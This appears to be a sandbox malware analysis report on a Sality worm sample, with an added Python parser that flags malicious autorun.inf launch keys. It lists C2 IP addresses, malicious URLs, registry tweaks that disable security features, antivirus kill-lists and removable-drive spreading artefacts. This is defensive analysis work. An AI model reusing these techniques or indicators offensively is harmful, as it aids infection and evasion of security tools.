2024-10-18T09:39:16.194613+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 62514 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:17.525520+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 62516 | 185.53.178.50 | 80 | TCP
2024-10-18T09:39:21.577260+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 62517 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:22.899604+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 62518 | 185.53.178.50 | 80 | TCP
2024-10-18T09:39:26.962883+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 62519 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:28.305192+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 62521 | 185.53.178.50 | 80 | TCP
2024-10-18T09:39:32.388529+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 62522 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:33.728702+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 62524 | 185.53.178.50 | 80 | TCP
2024-10-18T09:39:37.753556+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 62525 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:39.248321+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 62526 | 185.53.178.50 | 80 | TCP
2024-10-18T09:39:42.049055+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 62527 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:45.318935+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 62528 | 185.53.178.50 | 80 | TCP
2024-10-18T09:39:53.953751+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 62529 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:55.330024+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 62530 | 185.53.178.50 | 80 | TCP
2024-10-18T09:40:03.871177+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 62531 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:40:05.184315+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 62532 | 185.53.178.50 | 80 | TCP
2024-10-18T09:40:13.679122+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 62533 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:40:15.014967+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 62534 | 185.53.178.50 | 80 | TCP
2024-10-18T09:40:23.537013+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 62535 | 190.120.227.91 | 8080 | TCP

            AV Detection

Source: PfBjDhHzvV.exe, Avira: detected
Source: C:\Users\user\AppData\Local\Temp\winbwxmuq.exe, Avira: detection malicious, Label: W32/Sality.AT
Source: C:\Users\user\AppData\Local\Temp\winysum.exe, Avira: detection malicious, Label: W32/Sality.AT
Source: C:\Users\user\AppData\Local\Temp\xjjalq.exe, Avira: detection malicious, Label: W32/Sality.AT
Source: C:\Users\user\AppData\Local\Temp\xlroe.exe, Avira: detection malicious, Label: W32/Sality.AT
Source: C:\taqcpb.exe, Avira: detection malicious, Label: W32/Sality.AT
Source: 00000000.00000003.1375059861.0000000004500000.00000004.00001000.00020000.00000000.sdmp, Malware Configuration Extractor: Metasploit {"Type": "Metasploit Connect", "IP": "189.25.42.209", "Port": 1338}
Source: PfBjDhHzvV.exe, ReversingLabs: Detection: 94%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\winbwxmuq.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\winysum.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\xjjalq.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\xlroe.exe, Joe Sandbox ML: detected
Source: C:\taqcpb.exe, Joe Sandbox ML: detected
Source: PfBjDhHzvV.exe, Joe Sandbox ML: detected
Source: PfBjDhHzvV.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: Binary string: .objK.pdb source: SearchApp.exe, 0000000F.00000000.1623611969.000001F4AEDB0000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: faawXJQQDELvfTymNiVz.exe, 0000001D.00000002.2629107069.000000000038E000.00000002.00000001.01000000.00000008.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001E.00000002.2632453273.000000000038E000.00000002.00000001.01000000.00000008.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001F.00000000.1802713048.000000000038E000.00000002.00000001.01000000.00000008.sdmp, faawXJQQDELvfTymNiVz.exe, 00000020.00000002.2625174200.000000000038E000.00000002.00000001.01000000.00000008.sdmp, faawXJQQDELvfTymNiVz.exe, 00000021.00000000.1806477058.000000000038E000.00000002.00000001.01000000.00000008.sdmp, faawXJQQDELvfTymNiVz.exe, 00000022.00000002.2626066877.000000000038E000.00000002.00000001.01000000.00000008.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2636248303.000000000038E000.00000002.00000001.01000000.00000008.sdmp

            Spreading

            Source: Yara match | File source: 35.2.faawXJQQDELvfTymNiVz.exe.2880000.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.PfBjDhHzvV.exe.1260000.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: Process Memory Space: PfBjDhHzvV.exe PID: 7272, type: MEMORYSTR
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | File created: C:\autorun.inf
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File opened: z:
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File opened: y:
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File opened: x:
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File opened: w:
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File opened: v:
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File opened: u:
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File opened: t:
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File opened: s:
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File opened: r:
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File opened: q:
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File opened: p:
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File opened: o:
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File opened: n:
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File opened: m:
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File opened: l:
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File opened: k:
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File opened: j:
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File opened: i:
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File opened: h:
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File opened: g:
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File opened: f:
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File opened: e:
            Source: C:\Windows\System32\dllhost.exe | File opened: c:
            Source: PfBjDhHzvV.exe | Binary or memory string: [AutoRun]
            Source: PfBjDhHzvV.exe | Binary or memory string: autorun.inf
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000F65000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\autorun.inf
            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B61000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B61000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\C:\autorun.infE
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FAC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rxjetwu lmqoautorun.inftl
            Source: PfBjDhHzvV.exe, 00000000.00000002.2247577111.000000000527C000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: [AutoRun]
            Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: autorun.inf
            Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: _kkiuynbvnbrev406C:\hh8geqpHJTkdns6MCIDRV_VERMozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)MPRNtQuerySystemInformationSoftware\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache GlobalUserOfflineSoftware\Microsoft\Windows\CurrentVersion\Internet SettingsSoftware\Microsoft\Windows\CurrentVersionhttp://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers\KeServiceDescriptorTable_os%d%dhttp://kukutrustnet777888.info/DisableTaskMgrSoftware\Microsoft\Windows\CurrentVersion\policies\systemEnableLUASoftware\Microsoft\Windows\ShellNoRoam\MUICachemonga_bongapurity_control_7728SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile%s:*:Enabled:ipsecSYSTEM\CurrentControlSet\Services\SharedAccessStart\AuthorizedApplications\ListSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AdvancedHidden[AutoRun]
            Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: shell\explore\Commandshell\Autoplay\commandDisableRegistryToolsDAEMON.Simple Poly Engine v1.1a(c) Sector\SvcSOFTWARE\Microsoft\Security CenterAntiVirusOverrideAntiVirusDisableNotifyFirewallDisableNotifyFirewallOverrideUpdatesDisableNotifyUacDisableNotifyAntiSpywareOverrideSYSTEMkukutrusted!.CreateMutexAKERNEL32TEXTUPXCODEGdiPlus.dllDEVICEMB.loghttp://\Runhttpipfltdrv.syswww.microsoft.com?%x=%d&%x=%dSYSTEM.INIUSER32.DLL.%c%s\\.\amsint32.EXE.SCRSfcIsFileProtectedsfcdrw.VDB.AVCNTDLL.DLLrnd=autorun.infEnableFirewallDoNotAllowExceptionsDisableNotificationsWNetEnumResourceAWNetOpenEnumAWNetCloseEnumADVAPI32.DLLCreateServiceAOpenSCManagerAOpenServiceACloseServiceHandleDeleteServiceControlService__hStartServiceANOTICE__drIPFILTERDRIVERChangeServiceConfigAwin%s.exe%s.exeWININET.DLLInternetOpenAInternetReadFileInternetOpenUrlAInternetCloseHandleAVPAgnitum Client Security ServiceALGAmon monitoraswUpdSvaswMon2aswRdraswSPaswTdiaswFsBlkacssrvAV Engineavast! iAVS4 Control Serviceavast! Antivirusavast! Mail Scanneravast! Web Scanneravast! Asynchronous Virus Monitoravast! Self ProtectionAVG E-mail ScannerAvira AntiVir Premium GuardAvira AntiVir Premium WebGuardAvira AntiVir Premium MailGuardBGLiveSvcBlackICECAISafeccEvtMgrccProxyccSetMgrCOMODO Firewall Pro Sandbox DrivercmdGuardcmdAgentEset ServiceEset HTTP ServerEset Personal FirewallF-Prot Antivirus Update MonitorfsbwsysFSDFWDF-Secure Gatekeeper Handler StarterFSMAGoogle Online ServicesInoRPCInoRTInoTaskISSVCKPF4KLIFLavasoftFirewallLIVESRVMcAfeeFrameworkMcShieldMcTaskManagerMpsSvcnavapsvcNOD32krnNPFMntorNSCServiceOutpost Firewall main moduleOutpostFirewallPAVFIRESPAVFNSVRPavProtPavPrSrvPAVSRVPcCtlComPersonalFirewalPREVSRVProtoPort Firewall servicePSIMSVCRapAppSharedAccessSmcServiceSNDSrvcSPBBCSvcSpIDer FS Monitor for Windows NTSpIDer Guard File System MonitorSPIDERNTSymantec Core LCSymantec Password ValidationSymantec AntiVirus Definition WatcherSavRoamSymantec AntiVirusTmntsrvTmPfwUmxAgentUmxCfgUmxLUUmxPolvsmonVSSERVWebrootDesktopFirewallDataServiceWebrootFirewallwscsvcXCOMMSystem\CurrentControlSet\Control\SafeBoot%d%d.tmpSOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList%s\%s%s\Software\Microsoft\Windows\CurrentVersion\Ext\StatsSoftware\Microsoft\Windows\CurrentVersion\Ext\StatsSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper ObjectsKERNEL32.DLLbootshellSYSTEM.INIExplorer.exeAVPM.A2GUARDA2CMD.A2SERVICE.A2FREEAVASTADVCHK.AGB.AKRNL.AHPROCMONSERVER.AIRDEFENSEALERTSVCAVIRAAMON.TROJAN.AVZ.ANTIVIRAPVXDWIN.ARMOR2NET.ASHAVAST.ASHDISP.ASHENHCD.ASHMAISV.ASHPOPWZ.ASHSERV.ASHSIMPL.ASHSKPCK.ASHWEBSV.ASWUPDSV.ASWSCANAVCIMAN.AVCONSOL.AVENGINE.AVESVC.AVEVAL.AVEVL32.AVGAMAVGCC.AVGCHSVX.AVGCSRVX.AVGNSX.AVGCC32.AVGCTRL.AVGEMC.AVGFWSRV.AVGNT.AVCENTERAVGNTMGRAVGSERV.AVGTRAY.AVGUARD.AVGUPSVC.AVGWDSVC.AVINITNT.AVKSERV.AVKSERVICE.AVKWCTL.AVP.AVP32.AVPCC.AVASTAVSERVER.AVSCHED32.AVSYNMGR.AVWUPD32.AVWUPSRV.AVXMONITORAVXQUAR.BDSWITCH.BLACKD.BLACKICE.CAFIX.BITDEFENDERCCEVTMGR.CFP.CFPCONFIG.CCSETMGR.CFIAUDIT.CLAMTRA
            Source: faawXJQQDELvfTymNiVz.exe | Binary or memory string: autorun.inf
            Source: faawXJQQDELvfTymNiVz.exe | Binary or memory string: [AutoRun]
            Source: faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2788375210.000000000520E000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2803863120.000000000575B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: autorun.inf
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Code function: 0_2_01291060 Sleep,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,Sleep,lstrlen,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,lstrcpy,lstrcat,DeleteFileA,lstrcpy,lstrlen,lstrcmpiA,FindClose,Sleep | 0_2_01291060
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Code function: 0_2_0128A2F5 Sleep,GetTempPathA,lstrlen,lstrcat,lstrlen,lstrcpy,lstrcat,FindFirstFileA,FindNextFileA,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,Sleep,FindClose,Sleep,RtlExitUserThread | 0_2_0128A2F5
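The autorun.inf drop at C:\ together with the drive-letter sweep from z: down to e: is the sample's removable-media spreading: on Windows versions that still honour the file, the `open`, `shellexecute` and `shell\<verb>\command` keys in the `[autorun]` section name a program to run when the drive is inserted or opened. The Python below is an added triage parser, not code from the Joe Sandbox report or from the sample. The autorun.inf it parses is constructed to use the key spellings found in the sample's strings (`[AutoRun]`, `shell\explore\Command`, `shell\Autoplay\command`); the executable name in it is invented.

```python
import os
import re
from typing import Dict, Iterable, List, Tuple

# Added example, not part of the Joe Sandbox report: triage parser for the
# autorun.inf a Sality-style worm writes to each drive root.

# Keys whose values Windows executes when a drive is inserted or opened.
# Section and key names are compared case-insensitively because Windows does,
# which is why the sample carries both "[AutoRun]" and "[autorun]" spellings.
LAUNCH_KEYS = (
    "open",
    "shellexecute",
    "shell\\open\\command",
    "shell\\explore\\command",
    "shell\\autoplay\\command",
)

EXECUTABLE_EXT = re.compile(r"\.(exe|scr|com|bat|cmd|pif)\b", re.IGNORECASE)

# Constructed sample mirroring the key names in the sample's strings
# ("[AutoRun]", "shell\explore\Command", "shell\Autoplay\command");
# the executable name is invented.
SAMPLE_AUTORUN = """[AutoRun]
; comment lines are ignored by the parser
open=rxjetwu.exe
shell\\explore\\Command=rxjetwu.exe
shell\\Autoplay\\command=rxjetwu.exe
shell=explore
icon=%SystemRoot%\\system32\\SHELL32.dll,4
"""


def parse_autorun(text: str) -> Dict[str, str]:
    """Return lower-cased key -> value pairs from the [autorun] section.

    Hand-rolled rather than configparser because the keys contain backslashes
    and both section and key names must be compared case-insensitively.
    """
    entries: Dict[str, str] = {}
    in_autorun = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if in_autorun and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip().lower()] = value.strip()
    return entries


def launch_commands(text: str) -> List[Tuple[str, str]]:
    """(key, command) pairs that would run code on insert, open or double-click."""
    entries = parse_autorun(text)
    return [(key, entries[key]) for key in LAUNCH_KEYS if key in entries]


def is_suspicious(text: str) -> bool:
    """True when any launch key points at an executable file type."""
    return any(EXECUTABLE_EXT.search(cmd) for _, cmd in launch_commands(text))


def scan_roots(roots: Iterable[str]) -> Dict[str, List[Tuple[str, str]]]:
    """Look for autorun.inf at each drive root and report its launch commands."""
    findings: Dict[str, List[Tuple[str, str]]] = {}
    for root in roots:
        path = os.path.join(root, "autorun.inf")
        if not os.path.isfile(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            commands = launch_commands(fh.read())
        if commands:
            findings[root] = commands
    return findings


if __name__ == "__main__":
    for key, command in launch_commands(SAMPLE_AUTORUN):
        print(f"{key} -> {command}")
    print("suspicious:", is_suspicious(SAMPLE_AUTORUN))
```

`shell=explore` in the constructed file makes the `explore` verb the default, so the `shell\explore\command` entry also fires on a plain double-click of the drive. Windows has shipped with AutoRun disabled for USB media since 2011, so on a current host the file is primarily an infection marker for the drives the sample enumerated; `scan_roots` takes mount points such as `E:\` or `/media/usb` for that purpose.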

            Networking

            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49758 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:49737 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49737 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49813 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49783 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:49824 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49824 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:49888 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49888 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49913 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:49790 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:49851 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49881 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49731 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:49764 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49764 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49845 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49790 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62459 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62459 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62514 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62524 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49851 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62535 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62532 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62517 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62519 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62517 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62525 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62525 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62487 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62535 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62531 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62533 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62533 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62514 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62534 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62519 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62528 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62510 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:49922 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49922 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62531 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62513 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49943 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62521 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62516 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62529 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62529 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62527 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62527 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62522 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62522 -> 190.120.227.91:8080
